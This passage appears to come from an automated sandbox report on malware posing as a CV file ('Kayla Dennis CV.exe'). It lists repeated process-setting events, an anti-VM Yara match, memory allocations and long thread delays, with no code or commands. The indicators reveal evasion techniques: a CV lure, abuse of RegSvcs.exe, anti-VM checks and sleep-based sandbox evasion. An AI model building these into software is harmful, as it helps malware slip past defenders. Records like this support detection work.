Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Kayla Dennis CV.exe PID: 6300, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: lyKbfEsVYfQfU.exe PID: 7428, type: MEMORYSTR

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory allocated: 18A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory allocated: 3420000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory allocated: 1A00000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory allocated: 86A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory allocated: 96A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory allocated: 9860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Memory allocated: A860000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory allocated: 1500000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory allocated: 2FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory allocated: 4FB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory allocated: 7DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory allocated: 8DE0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory allocated: 8F90000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\lyKbfEsVYfQfU.exe	Memory allocated: 9F90000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\Kayla Dennis CV.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599641	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599297	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599188	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 599063	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598938	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 598079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 597079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596204	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 596079	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595954	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595829	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595704	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595579	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595454	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595329	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 595203	Jump to behavior
